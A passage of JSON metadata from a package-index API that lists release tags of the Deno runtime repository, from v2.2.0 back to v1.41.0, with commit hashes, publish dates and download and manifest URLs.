2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33ee